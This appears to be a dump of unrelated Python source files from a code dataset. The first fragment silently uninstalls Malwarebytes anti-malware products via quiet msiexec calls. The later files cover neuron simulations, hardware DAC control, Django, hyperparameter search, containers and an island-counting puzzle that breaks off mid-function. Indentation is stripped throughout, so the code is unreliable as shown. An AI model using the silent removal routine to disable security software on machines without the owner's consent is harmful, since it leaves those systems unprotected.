rklist=[(_winreg.HKEY_LOCAL_MACHINE,uninstallkey_32,_winreg.KEY_WOW64_32KEY | _winreg.KEY_READ),
(_winreg.HKEY_LOCAL_MACHINE,uninstallkey_32,_winreg.KEY_WOW64_64KEY | _winreg.KEY_READ),
(_winreg.HKEY_CURRENT_USER,uninstallkey_32,_winreg.KEY_WOW64_32KEY | _winreg.KEY_READ),
(_winreg.HKEY_CURRENT_USER,uninstallkey_32,_winreg.KEY_WOW64_64KEY | _winreg.KEY_READ)]
else:
rklist=[(_winreg.HKEY_LOCAL_MACHINE,uninstallkey_32,_winreg.KEY_READ),
(_winreg.HKEY_CURRENT_USER,uninstallkey_32,_winreg.KEY_READ)]
bet=[]
for i in rklist:
col=collectprograms(i[0], i[1], i[2])
for c in col:
print c
if blacklist in c:
bet.append(c[1])
if not bet:
print "Please Mention the valid blacklist Installed Software"
else:
for i in bet:
print i
j=i.replace(" ", '" "')
v='\\'
path="HKEY_LOCAL_MACHINE"+v+i
path1="HKEY_LOCAL_MACHINE"+v+j
got=path1
return got
inst=check()
if len(inst)>0:
find=re.findall("{.*}\s\sMalwarebytes'\sManaged\\sClient",inst)
if len(find)>0:
final=re.findall('{.*}',find[0])[0]
if len(final) == 38:
print "\n\t*)Malwarebytes' Managed Client Uninstallation started......"
cmd='msiexec.exe /x %s /quiet REBOOT=ReallySuppress REMOVE=ALL'%final
os.popen(cmd).read()
else:
fin=reg()
fina=fin.split('\\')[-1]
final1=re.findall('{.*}',fina)[0]
print "\n\t*)Malwarebytes' Managed Client Uninstallation started......"
cmd='msiexec.exe /x %s /quiet REBOOT=ReallySuppress REMOVE=ALL'%final1
os.popen(cmd).read()
def checkapp(AppName):
import _winreg
import os
AppName = AppName.lower()
def DNDS(rtkey, pK, kA):
ln = []
lv = []
try:
oK = _winreg.OpenKey(rtkey, pK, 0, kA)
i = 0
while True:
try:
bkey = _winreg.EnumKey(oK, i)
vkey = os.path.join(pK, bkey)
oK1 = _winreg.OpenKey(rtkey, vkey, 0, kA)
try:
tls = []
DN, bla = _winreg.QueryValueEx(oK1, 'DisplayName')
DV, bla = _winreg.QueryValueEx(oK1, 'DisplayVersion')
_winreg.CloseKey(oK1)
ln.append(DN)
lv.append(DV)
except:
pass
i += 1
except:
break
_winreg.CloseKey(oK)
return zip(ln, lv)
except:
return zip(ln, lv)
rK = _winreg.HKEY_LOCAL_MACHINE
sK = r'SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
openedKey = _winreg.OpenKey(rK, sK, 0, _winreg.KEY_READ)
arch, bla = _winreg.QueryValueEx(openedKey, 'PROCESSOR_ARCHITECTURE')
arch = str(arch)
_winreg.CloseKey(openedKey)
if arch == 'AMD64':
fList = DNDS(_winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', _winreg.KEY_WOW64_32KEY | _winreg.KEY_READ)
fList.extend(DNDS(_winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', _winreg.KEY_WOW64_64KEY | _winreg.KEY_READ))
fList.extend(DNDS(_winreg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', _winreg.KEY_WOW64_32KEY | _winreg.KEY_READ))
fList.extend(DNDS(_winreg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', _winreg.KEY_WOW64_64KEY | _winreg.KEY_READ))
else:
fList = DNDS(_winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', _winreg.KEY_READ)
fList.extend(DNDS(_winreg.HKEY_CURRENT_USER, r'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', _winreg.KEY_READ))
fList = set(fList)
lr = []
rs = 0
for i in fList:
a, b = i
if AppName in a.lower():
lr.append('success: {} is installed'.format(a))
lr.append('{:<25}{:5}'.format(a, b))
rs += 1
else:
rs += 0
if rs:
return True
return False
def recheck():
app3=checkapp('Malwarebytes Anti-Malware')
app8=checkapp('Malwarebytes Anti-Malware')
if app3:
print '\n\t\t*)Try again with Uninstall String'
gid('Malwarebytes Anti-Malware')
if app8:
print "\n\t\t*)Malwarebytes Anti-Malware Uninstalled Failed...."
return '0'
else:
print "\n\t\t*)Malwarebytes Anti-Malware Uninstalled Successfully...."
return '1'
else:
print "\n\t*)Malwarebytes Anti-Malware Uninstalled Successfully...."
return '1'
def recheck1():
app4=checkapp('Malwarebytes Anti-Exploit')
app9=checkapp('Malwarebytes Anti-Malware')
if app4:
print '\n\t\t*)Try again with Uninstall String'
gid('Malwarebytes Anti-Exploit')
if app9:
print "\n\t\t*)Malwarebytes Anti-Exploit Uninstalled Failed...."
return '0'
else:
print "\n\t\t*)Malwarebytes Anti-Exploit Uninstalled Successfully...."
return '1'
else:
print "\n\t*)Malwarebytes Anti-Exploit Uninstalled Successfully...."
return '1'
def recheck2():
app6=checkapp('Malwarebytes version')
app10=checkapp('Malwarebytes Anti-Malware')
if app6:
print '\n\t\t*)Try again with Uninstall String'
gid('Malwarebytes version')
if app10:
print "\n\t\t*)Malwarebytes Uninstalled Failed...."
return '0'
else:
print "\n\t\t*)Malwarebytes Uninstalled Successfully...."
return '1'
else:
print "\n\t*)Malwarebytes Uninstalled Successfully...."
return '1'
def recheck3():
app7=checkapp("Malwarebytes' Managed Client")
app11=checkapp('Malwarebytes Anti-Malware')
if app7:
print "\n\t*)Malwarebytes' Managed Client Uninstalled Failed...."
else:
print "\n\t*)Malwarebytes' Managed Client Uninstalled Successfully...."
return '1'
app1=checkapp('Malwarebytes Anti-Malware')
app2=checkapp('Malwarebytes Anti-Exploit')
app5=checkapp('Malwarebytes version')
app7=checkapp("Malwarebytes' Managed Client")
if app1:
print "Malwarebytes Anti-Malware is Found in the system"
uni()
r=recheck()
else:
print "\nMalwarebytes Anti-Malware is not found in the system"
r=1
if app2:
print "\nMalwarebytes Anti-Exploit is Found in the System"
uni2()
r1=recheck1()
else:
print "\nMalwarebytes Anti-Exploit is not found in the system"
r1=1
if app5:
print "\nMalwarebytes is Found in the system"
uni3()
r2=recheck2()
else:
print "\nMalwarebytes is not found in the system"
r2=1
if app7:
print "\nMalwarebytes' Managed Client is Found in the system"
uni4()
r3=recheck3()
else:
print "\nMalwarebytes' Managed Client is not found in the system"
r3=1
|
7,134 | 6dbafbcf126c37edb2187eb28c01e2c1125c1c64 | import sys, os; sys.path.insert(0,'..'); sys.path.insert(0,'../NEURON');
from tests.cells.NEURONCellTest import NEURONCellTest
from tests.cells.NeuroMLCellTest import NeuroMLCellTest
class NEURON(NEURONCellTest):
def __init__(self):
super(NEURON, self).__init__()
self.path = "../NEURON/granule.hoc"
self.label = "granule"
self.resultsFile = "results/cells/granule/NEURON.json"
self.currentRange = (-0.01, 0.1)
def prepare(self, h):
# Build the network with 1GC
sys.path.append(os.getcwd())
import customsim
import modeldata
customsim.setup(1, 1)
model = modeldata.getmodel()
cell = model.granules[110821] # The GC of the first MC
h.celsius = 24
return cell
class NeuroML(NeuroMLCellTest):
def __init__(self):
super(NeuroML, self).__init__()
self.path = "../NeuroML2/GranuleCells/Exported/Granule_0_110821.cell.nml"
self.label = "granule"
self.resultsFile = "results/cells/granule/NeuroML.json"
self.id = "Granule_0_110821"
self.currentRange = (-0.01, 0.1)
def prepare(self, h):
# Load the cell hoc
h.load_file(self.id+".hoc")
cell = getattr(h,self.id)()
h.celsius = 24
return cell
|
7,135 | 3727c4413cd69305c8ee8d02f4532629da7d25de | def twenty():
pass |
7,136 | 10e1756dc1d6c7b6b7e3569de78e9fa4cdfb0d7e | #-*- coding: UTF-8 -*-
import re
import time
import sys
import command.server.handle_utility as Utility
from ee.common import logger
from ee.common import xavier as Xavier1
sys.path.append('/opt/seeing/app/')
from b31_bp import xavier1 as Xavier2
global agv
agv=sys.argv[1]
Xavier=Xavier1
xavier_module = {"tcp:7801":Xavier1, "tcp:7802":Xavier2}
if agv in xavier_module:
Xavier=xavier_module[agv]
test_base_board_name = "zynq"
global batt_value
batt_value={"current":1,"voltage":1,}#current unit mA,mV
global vbus_value
vbus_value={"current":1,"voltage":1,}#current unit mA,mV
dac_list=[ "psu1_ocp" , "psu1_ovp", "psu1_ocp_ad5601" , "psu1_ovp_ad5601", "psu1_current", "psu1_voltage",
"psu2_ocp", "psu2_ovp","psu2_ocp_ad5601", "psu2_ovp_ad5601","psu2_current", "psu3_ocp","psu3_ocp_ad5601","psu3_ovp", "psu2_voltage","psu3_ovp_ad5601", "psu3_current" ,"psu3_voltage", "base_board"]
help_str=''
for i in dac_list:
help_str=help_str+i+',\r\n\t '
# global calibration_var
# def _calibration_init():
# global calibration_var
# """ไปeeprom่ฏปๅๆฐๆฎ็็จๅบ"""
# _calibration_init()#่ฟไธชๅฝๆฐๆจกๅไธ
#
def dac_voltage_set_handle(params):
help_info = "dac set(<channel>,<value>)$\r\n\
\t channel("+help_str+")\tvalue: (if ad5761: (0~10000) unit:mv,else :(0~5000) unit:mv) $\r\n"
''' params init '''
''' help '''
if Utility.is_ask_for_help(params) is True:
return Utility.handle_done(help_info)
''' parametr analysis '''
if len(params)!=2:
return Utility.handle_error(Utility.handle_errorno["handle_errno_parameter_invalid"],\
"param length error" )
channel=params[0]
if channel not in dac_list:
return Utility.handle_error(Utility.handle_errorno["handle_errno_parameter_invalid"] ,\
"channel parameter error" )
volt_value=float(params[1])
if channel=="psu3_voltage" or channel=="psu2_voltage" :
if volt_value<0 or volt_value>10000:
return Utility.handle_error(Utility.handle_errorno['handle_errno_parameter_invalid'],\
"param voltage value error" + str(volt_value))
elif channel=="base_board" :
if volt_value<0 or volt_value>3300:
return Utility.handle_error(Utility.handle_errorno['handle_errno_parameter_invalid'],\
"param voltage value error" + str(volt_value))
else:
if volt_value<0 or volt_value>5000:
return Utility.handle_error(Utility.handle_errorno['handle_errno_parameter_invalid'],\
"param voltage value error" + str(volt_value))
ret=Xavier.call("eval",test_base_board_name,"voltage_set",channel,volt_value)
if ret==False:
return Utility.handle_error(Utility.handle_errorno['handle_errno_execute_failure'],\
"execute error")
return Utility.handle_done()
def dac_5761_write_register_handle(params):
help_info = "ad5761 register write(<addr>,<data>)$\r\n\
\t addr:register address $\r\n\
\t data:2byte data\r\n"
''' params init '''
''' help '''
if Utility.is_ask_for_help(params) is True:
return Utility.handle_done(help_info)
''' parametr analysis '''
if len(params)!=2:
return Utility.handle_error(Utility.handle_errorno["handle_errno_parameter_invalid"],\
"param length error" )
addr=int(params[0],16)
data=int(params[1],16)
ret=Xavier.call("eval",test_base_board_name,"ad5761_write_register",addr,data)
if ret==False:
return Utility.handle_error(Utility.handle_errorno['handle_errno_execute_failure'],\
"execute error")
return Utility.handle_done()
|
7,137 | 3344eb5b3e5b5eaee7b08d0991be732dae62c7fc | import io
from PIL import Image
def bytes_from_file(path, size, quality=15):
img = Image.open(path)
img = img.resize(size)
img_byte_arr = io.BytesIO()
img.save(img_byte_arr, format="JPEG", quality=quality)
return img_byte_arr.getvalue()
|
7,138 | 721e014bc5bf53a39556e31f281b77b90508cf12 | # -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# California Institute of Technology
# (C) 2008 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from vnf.components.ComputationResultRetriever import ComputationResultRetriever as base
class Retriever(base):
def _retrieveResultsFor(self, computation):
director = self.director
db = director.clerk.db
orm = director.clerk.orm
analysisObj = orm.record2object(computation)
# must have a job
self.declareProgress(0.1, 'look up job')
job = computation.getJob(db)
# check result is available
self.declareProgress(0.2, 'check if results exist')
self._check_results_sanity(expected_results=[analysisObj._dosFile], job=job)
# create a dos record to save dos
self.declareProgress(0.4, 'create a DOS data object to store the result')
from vnf.dom.material_simulations.PhononDOS import PhononDOSTable
dos = self._make_result_holder(computation, PhononDOSTable)
#dos.matter = computation.matter #analysis calc does not have matter ref!
db.updateRecord(dos)
# save the result from job to dos
#dosObj = orm.record2object(dos)
#server = self.db.dereference(job.server)
#is_available = self.dds.is_available
#dosObj.read(analysisObj.dosFile)
#from idf import DOS
#DOS.write(dosObj.e, dosObj.i, 'data.idf')
self.declareProgress(0.5, 'get result from server')
#self._save_result(computation, job, analysisObj.dosFile, dos, 'data.txt')
self._save_result(computation, job, 'data.idf', dos, 'data.idf')
def retriever():
return Retriever('mddoscalc')
# version
__id__ = "$Id$"
# End of file
|
7,139 | 3d3b77630d275f830daf9f6e0d50a77ef624521e | # Midterm Review Class!
'''
This is a Multi line comment:
'''
# Break and Continue
# for i in range(10):
# if i == 5:
# continue
# print(i)
# Prints 0-4, 6-9
# # Structure
# Some MCQ
# Some T/F
# Some short answer
# # Lists
# Append
# remove
# del
# sort
# #Strings
# replace
# join
# split
# upper
# lower
# # Variables as conditions:
#
# a = 8
# if a:
# print("This evaluted to true")
# else:
# print("False")
#
# # General rule: Any variable that is either 0 or empty (empty string "" or []) will evaluate to false
# # Anything else will evaluate to true
# # Immutables vs. Mutables
# # Lists are mutable
#
# words = ["burrito", "pad thai", "hot dogs"]
# print(words)
# words[0] = "pizza"
# print(words)
#
# # Strings are not
#
# pet = "Mocha"
# print(pet)
# print(pet[1])
# # pet [1] = "a" # CANNOT DO THIS
# pet = pet.replace("o", "a")
# print(pet)
# Functions
# Write a function called countWords
# Count how many times a word appears in a list
# Input: list of strings, and a string to search for
# Output: an integer representing how many times the searched word was found
# def countWords(wordList, searchWord):
# counter = 0
# for word in wordList:
# if word == searchWord:
# counter += 1
#
# return counter
#
# # Now write a main function to use the countWords function to create a list of words and use countWords
# # to figure out how many times word is in wordList
#
# def main():
# vegetables = ["celery", "carrot", "celery", "spinach", "celery", "kale"]
# veggieWord1 = "celery"
#
# veggieCount1 = countWords(vegetables, veggieWord1)
# print(veggieWord1,"appears",veggieCount1,"times.")
#
#
#
# main()
# # Delimiters
# # Character that separates elements
# msg = "hi, brandon, is, not, feeling, well"
# wordList = msg.split(",")
# for item in wordList:
# print(item, end="")
# print()
# print(wordList)
#
# newMsg = " ".join(wordList)
# print(newMsg)
# File Reading/Writing
# def main():
# fileIn = open("cities.txt", "r")
# for line in fileIn:
# line = line.strip()
# print(line)
#
#
# main()
for i in range(0,100,10):
print(i + 10)
|
7,140 | d5f66d92371838c703abbf80e2b78717cdd4a4fb | from django.shortcuts import render
from django.http import HttpResponse
# from appTwo.models import User
from appTwo.forms import NewUserForm
# Create your views here.
# def index(request):
# return HttpResponse("<em>My Second Project</em>")
def welcome(request):
# welcomedict={'welcome_insert':'Go to /users to see the list of user information!'}
return render(request,'welcome.html')
def users(request):
# users_list=User.objects.all()
# user_dict={'users':users_list}
form = NewUserForm()
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
form.save(commit=True)
return welcome(request)
else:
print('ERROR FORM INVALID')
return render(request,"users.html",{'form':form})
|
7,141 | c0524301a79788aa34a039fc46799021fb45362c | import random
from common.ast import *
from mutate.mutate_ctrl import *
def _check_parent_type(node, nodes, types):
par = node
while(nodes[par] != None):
par = nodes[par]
if type(par) in types:
return True
return False
def mutate_operator(root, nodes, path):
candidates = [node
for node in nodes.keys()
if type(node) in OP_TYPES.keys()
and _check_parent_type(node, nodes, OP_PARENT_TYPES)]
if len(candidates) == 0:
return -1
mut_node = random.choice(candidates)
type_idx = OP_TYPES[type(mut_node)]
new_node_type = random.choice([types for types in OP_MAP[type_idx] if types != type(mut_node)])
mut_node.__class__ = new_node_type
save_ast(root, path)
return mut_node.lineno
def mutate_signal(root, nodes, path):
candidates = [node
for node in nodes.keys()
if type(node) == Identifier
and _check_parent_type(node, nodes, SIG_PARENT_TYPES)]
if len(candidates) == 0:
return -1
sigs = get_signals(root)
trial = 0
while (trial < 1000):
trial += 1
mut_node = random.choice(candidates)
name = mut_node.name
if name in sigs.keys():
sig_type = sigs[name]
choices = [sig for sig in sigs[sig_type] if sig != name]
if len(choices) == 0:
continue
new_name = random.choice(choices)
mut_node.name = new_name
save_ast(root, path)
return mut_node.lineno
def mutate_constant(root, nodes, path):
return -1
def mutate_operand(root, nodes, path):
return -1
|
7,142 | 0ae626df5a471af77f7361bb765b46b861ee8a2c | # terrascript/spotinst/__init__.py
import terrascript
class spotinst(terrascript.Provider):
pass |
7,143 | cc097b4d2a5a521a0adb83ca1b58470b4ce84f39 | '''
Copyright
Jelen forrรกskรณd a Budapesti Mลฑszaki รฉs Gazdasรกgtudomรกnyi Egyetemen tartott
"Deep Learning a gyakorlatban Python รฉs LUA alapon" tantรกrgy segรฉdanyagakรฉnt kรฉszรผlt.
A tantรกrgy honlapja: http://smartlab.tmit.bme.hu/oktatas-deep-learning
Deep Learning kutatรกs: http://smartlab.tmit.bme.hu/deep-learning
A forrรกskรณdot GPLv3 licensz vรฉdi. รjrafelhasznรกlรกs esetรฉn lehetลsรฉg szerint kรฉrjรผk
az alรกbbi szerzลt รฉrtesรญteni.
2018 (c) Csapรณ Tamรกs Gรกbor (csapot kukac tmit pont bme pont hu),
Gyires-Tรณth Bรกlint, Zainkรณ Csaba
Links:
[hyperas] https://github.com/maxpumperla/hyperas
'''
# !pip3 install hyperas
# based on https://github.com/keras-team/keras/blob/master/examples/cifar10_cnn.py
import hyperas
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.callbacks import EarlyStopping, CSVLogger
import numpy as np
# do not use all GPU memory
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
set_session(tf.Session(config=config))
from keras.datasets import cifar10
# hiperparamรฉter optimalizรกlรกs hyperas-sal (https://github.com/maxpumperla/hyperas)
# a hyperas-nak kell kรฉt fรผggvรฉny:
# -- data() : adatok betรถltรฉse
# -- create_model() : hรกlรณzat modell
def data():
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
num_classes = 10
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# reshape for FC-DNN
x_train = np.reshape(x_train,(50000,3072)) # 32x32x3
x_test = np.reshape(x_test,(10000,3072))
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
# Normalization of pixel values (to [0-1] range)
x_train /= 255
x_test /= 255
return x_train, y_train, x_test, y_test
def create_model(x_train, y_train, x_test, y_test):
n_layer1 = {{choice([128, 256, 512])}}
n_layer2 = {{choice([128, 256, 512])}}
dropout_1 = {{uniform(0, 1)}}
dropout_2 = {{uniform(0, 1)}}
optim = {{choice(['rmsprop', 'adam', 'sgd'])}}
n_batch = {{choice([64, 128, 256])}}
print('Model hyperparameters: ', n_layer1, n_layer2, dropout_1, dropout_2, optim, n_batch)
# 3 x 3 x [0-1]x[0-1] x 3 x 3 = kb 8100 kombinรกciรณ
model = Sequential()
model.add(Dense(n_layer1, activation='relu', input_dim=3072))
model.add(Dropout(dropout_1))
model.add(Dense(n_layer2, activation='relu'))
model.add(Dropout(dropout_2))
model.add(Dense(10, activation='softmax'))
model.compile(optimizer=optim,
loss='categorical_crossentropy',
metrics=['accuracy'])
import datetime
current_date = '{date:%Y-%m-%d_%H-%M-%S}'.format(date=datetime.datetime.now())
print(current_date)
csv_name = '13_hyperas_cifar10_' + current_date + '_' + \
str(n_layer1) + '_' + str(n_layer2) + '_' + \
str(dropout_1) + '_' + str(dropout_2) + '_' + \
str(optim) + '_' + str(n_batch) + '.csv'
callbacks = [EarlyStopping(monitor='val_loss', patience=3, verbose=0), \
CSVLogger(csv_name, append=True, separator=';')]
result = model.fit(x_train, y_train,
batch_size=n_batch,
epochs=100,
verbose=2,
validation_data=(x_test, y_test),
callbacks=callbacks,
shuffle=True)
validation_acc = np.amax(result.history['val_acc'])
print('Best validation acc of epoch:', validation_acc)
return {'loss': -validation_acc, 'status': STATUS_OK, 'model': model}
from hyperopt import Trials, STATUS_OK, tpe
from hyperas import optim
from hyperas.distributions import choice, uniform
# main hyperopt part
# az algoritmus lehet:
# -- random.suggest -> random search
# -- tpe.suggest -> tree parsen estimator
best_run, best_model = optim.minimize(model=create_model,
data=data,
algo=tpe.suggest,
max_evals=5,
trials=Trials())
x_train, y_train, x_test, y_test = data()
print("Evalutation of best performing model:")
print(best_model.evaluate(x_test, y_test))
print("Best performing model chosen hyper-parameters:")
print(best_run)
|
7,144 | 899cdb5cbdbd0a57af76a5044d54e1fe2a497847 | '''
Created on Jan 19, 2014
@author: felix
'''
import sys
from PyPDF2 import PdfFileReader
from pytagcloud import create_tag_image, make_tags, LAYOUT_HORIZONTAL
from pytagcloud.lang.counter import get_tag_counts
def main():
for i in range(0, len(sys.argv)):
if (sys.argv[i] == '-f'):
try:
content = getPDFContent(sys.argv[i+1])
except:
raise RuntimeError('Something went wrong! Usage: makeCloudFromPdf -f inputfile.pdf')
tags = make_tags(get_tag_counts(content)[1:100], maxsize=100)
create_tag_image(tags, 'cloud_large2.png', size=(1920, 1080), background=(0, 0, 0, 255), layout=LAYOUT_HORIZONTAL, fontname='Vollkorn')
def getPDFContent(path):
content = ""
p = file(path, "rb")
pdf = PdfFileReader(p)
numPages = pdf.getNumPages()
print 'pages:', numPages
for i in range(0, numPages-1):
try:
content += pdf.getPage(i).extractText() + "\n"
except:
content += ""
#content = " ".join(content.replace(u"\xa0", " ").strip().split())
return content
if __name__ == "__main__":
main() |
7,145 | eb3a32c17d8e5e9f717e813d5612d077c8feac48 | import sys
import time
from cli.utils import get_container_runtime, get_containers, run_shell_cmd
runtime = get_container_runtime()
def rm(ids):
cmd = f'{runtime} rm {" ".join(ids)}'
sys.stdout.write(f'{cmd}\n')
run_shell_cmd(cmd)
def stop(ids):
cmd = f'{runtime} stop {" ".join(ids)}'
sys.stdout.write(f'{cmd}\n')
run_shell_cmd(cmd)
def undeploy_containers():
containers = [ container for _, container in get_containers().items() ]
running = [ c for c in containers if c.up ]
if len(running) > 0:
stop([ container.id for container in running ])
time.sleep(5)
containers = [ container for _, container in get_containers().items() ]
if len(containers) > 0:
rm([ container.id for container in containers ])
if __name__ == '__main__':
undeploy_containers() |
7,146 | de24b341102f5979cc48b22c3a07d42915b6dd18 | from .tokening import sign_profile_tokens, validate_token_record, \
get_profile_from_tokens
from .zone_file import create_zone_file
from .legacy import is_profile_legacy_format, get_person_from_legacy_format
|
7,147 | b46f19708e9e2a1be2bbd001ca6341ee7468a60d | #!/usr/bin/env python
# coding:utf-8
"""
200. ๅฒๅฑฟๆฐ้
้พๅบฆ
ไธญ็ญ
็ปๅฎไธไธช็ฑ '1'๏ผ้ๅฐ๏ผๅ '0'๏ผๆฐด๏ผ็ปๆ็็ไบ็ปด็ฝๆ ผ๏ผ่ฎก็ฎๅฒๅฑฟ็ๆฐ้ใไธไธชๅฒ่ขซๆฐดๅ
ๅด๏ผๅนถไธๅฎๆฏ้่ฟๆฐดๅนณๆนๅๆๅ็ดๆนๅไธ็ธ้ป็้ๅฐ่ฟๆฅ่ๆ็ใไฝ ๅฏไปฅๅ่ฎพ็ฝๆ ผ็ๅไธช่พนๅ่ขซๆฐดๅ
ๅดใ
็คบไพ 1:
่พๅ
ฅ:
11110
11010
11000
00000
่พๅบ: 1
็คบไพ 2:
่พๅ
ฅ:
11000
11000
00100
00011
่พๅบ: 3
"""
# ================================================================================
"""
ๆดชๆฐดๅกซๅ
็ฎๆณ(Flood Fill Algorithm)
"""
"""
Flood Fill ็ฎๆณ
ๆฏไปไธไธชๅบๅไธญๆๅ่ฅๅนฒไธช่ฟ้็็นไธๅ
ถไป็ธ้ปๅบๅๅบๅๅผ๏ผๆๅๅซๆๆไธๅ้ข่ฒ๏ผ็็ปๅ
ธ็ฎๆณใ
ๅ ไธบๅ
ถๆ่ทฏ็ฑปไผผๆดชๆฐดไปไธไธชๅบๅๆฉๆฃๅฐๆๆ่ฝๅฐ่พพ็ๅบๅ่ๅพๅใ
ไปไธไธช็นๆฉๆฃๅผ๏ผๆพๅฐไธๅ
ถ่ฟ้็็น๏ผ่ฟไธๆฏไปไน้ซๆทฑ็็ฎๆณ๏ผ
ๅ
ถๅฎๅฐฑๆฏไปไธไธช็นๅผๅง๏ผ่ฟ่กไธๆฌกโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโ๏ผ
้่ฟโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโๅ็ฐไธ็่ฟ็็ๅบๅ๏ผ
ๅฏนไบ่ฟ้้ขๆฅ่ฏด๏ผ
ๅฐฑๆฏไปไธไธชๆฏโ้ๅฐโ็ๆ ผๅญๅผๅง่ฟ่กไธๆฌกโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโ๏ผ
ๆไธไน็ธ่ฟ็ๆๆ็ๆ ผๅญ้ฝๆ ่ฎฐไธ๏ผ่งไธบๅ็ฐไบไธไธชโๅฒๅฑฟโใ
่ฏดๆ๏ผ
้ฃไนๆฏไธๆฌก่ฟ่กโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโ็ๆกไปถๅฐฑๆฏ๏ผ
1ใ่ฟไธชๆ ผๅญๆฏ้ๅฐ๏ผโ1โ๏ผ๏ผๅฆๆๆฏๆฐดๅ๏ผโ0โ๏ผๅฐฑๆ ไป่ฐ่ฎบโๅฒๅฑฟโ๏ผ
2ใ่ฟไธชๆ ผๅญไธ่ฝๆฏไนๅๅ็ฐโๅฒๅฑฟโ็่ฟ็จไธญๆง่กไบโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโๆไฝ๏ผ่่ขซๆ ่ฎฐ็ๆ ผๅญใ
"""
# ================================================================================
"""
ๆ่ทฏ:
DFS(ๆทฑๅบฆไผๅ
้ๅ)
(ๅๆบฏ)
ๆถ้ดๅคๆๅบฆ:
O()
็ฉบ้ดๅคๆๅบฆ:
O()
"""
class Solution(object):
# ๆนๅๆฐ็ป๏ผๅฎ่กจ็คบไบ็ธๅฏนไบๅฝๅไฝ็ฝฎ็ 4 ไธชๆนๅ็ๆจชใ็บตๅๆ ็ๅ็งป้
"""
x-1,y
x,y-1 x,y x,y+1
x+1,y
"""
# ่ฟ4ไธชๆนๅ็้กบๅบๆ ๅ
ณ็ดง่ฆ
# ๆญคๅค็ๆนๅ้กบๅบ๏ผไธใๅณใไธใๅทฆ
directions = [(-1, 0), (0, 1), (1, 0), (0, -1)]
def dfs(self, matrix, i, j, m, n, visited):
"""
ๆทฑๅบฆไผๅ
้ๅ
"""
visited[i][j] = True
# print '(%s,%s)' % (i, j)
for direction in self.directions:
new_i = i + direction[0]
new_j = j + direction[1]
"""
ๅฏนไธไธไธชๆ ผๅญ๏ผๆง่ก DFS ็ๆกไปถ:
1.ๆจชๅๆ ๅจ็ฝๆ ผๅ
2.็บตๅๆ ๅจ็ฝๆ ผๅ
3.่ฏฅๆ ผๅญๆฒกๆ่ขซ้ๅ่ฟ
4.่ฏฅๆ ผๅญๆฏ้ๅฐ
"""
if 0<=new_i<=m-1 \
and 0<=new_j<=n-1 \
and not visited[new_i][new_j] \
and matrix[new_i][new_j] == '1':
self.dfs(matrix, new_i, new_j, m, n, visited)
pass
pass
def numIslands(self, grid):
"""
:type grid: List[List[str]]
:rtype: int
"""
if len(grid) == 0:
return 0
m = len(grid)
n = len(grid[0])
# ๅญคๅฒ่ฎกๆฐ
island_count = 0
# ๅทฒ่ฎฟ้ฎ่ฟ็่ฎฐๅฝ็ฉ้ต
matrix_visited = [[False for _ in range(n)] for _ in range(m)]
"""
ไป (0,0) ๅผๅง๏ผๅฏนๆฏไธชๆ ผๅญๅฐ่ฏไธๆฌก DFS ๆไฝ
"""
for i in range(m):
for j in range(n):
# ๅช่ฆๆฏ้ๅฐ๏ผไธๆฒกๆ่ขซ่ฎฟ้ฎ่ฟ็๏ผๅฐฑๅฏไปฅไฝฟ็จ DFS ๅ็ฐไธไน็ธ่ฟ็้ๅฐ๏ผๅนถ่ฟ่กๆ ่ฎฐ
if grid[i][j] == '1' and not matrix_visited[i][j]:
self.dfs(grid, i, j, m, n, matrix_visited)
# ๅฒๅฑฟ่ฎกๆฐ +1 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
island_count += 1
# print 'island_count:', island_count
pass
pass
pass
return island_count
# ================================================================================
"""
ๆ่ทฏ:
BFS(ๅนฟๅบฆไผๅ
้ๅ)
(้่ฆไธไธช่พ
ๅฉ้ๅ)
ๆถ้ดๅคๆๅบฆ:
O()
็ฉบ้ดๅคๆๅบฆ:
O()
"""
class Solution(object):
# ๆนๅๆฐ็ป๏ผๅฎ่กจ็คบไบ็ธๅฏนไบๅฝๅไฝ็ฝฎ็ 4 ไธชๆนๅ็ๆจชใ็บตๅๆ ็ๅ็งป้
"""
x-1,y
x,y-1 x,y x,y+1
x+1,y
"""
# ่ฟ4ไธชๆนๅ็้กบๅบๆ ๅ
ณ็ดง่ฆ
# ๆญคๅค็ๆนๅ้กบๅบ๏ผไธใๅณใไธใๅทฆ
directions = [(-1, 0), (0, 1), (1, 0), (0, -1)]
def numIslands(self, grid):
"""
:type grid: List[List[str]]
:rtype: int
"""
if len(grid) == 0:
return 0
m = len(grid)
n = len(grid[0])
# ๅญคๅฒ่ฎกๆฐ
island_count = 0
# ๅทฒ่ฎฟ้ฎ่ฟ็่ฎฐๅฝ็ฉ้ต
matrix_visited = [[False for _ in range(n)] for _ in range(m)]
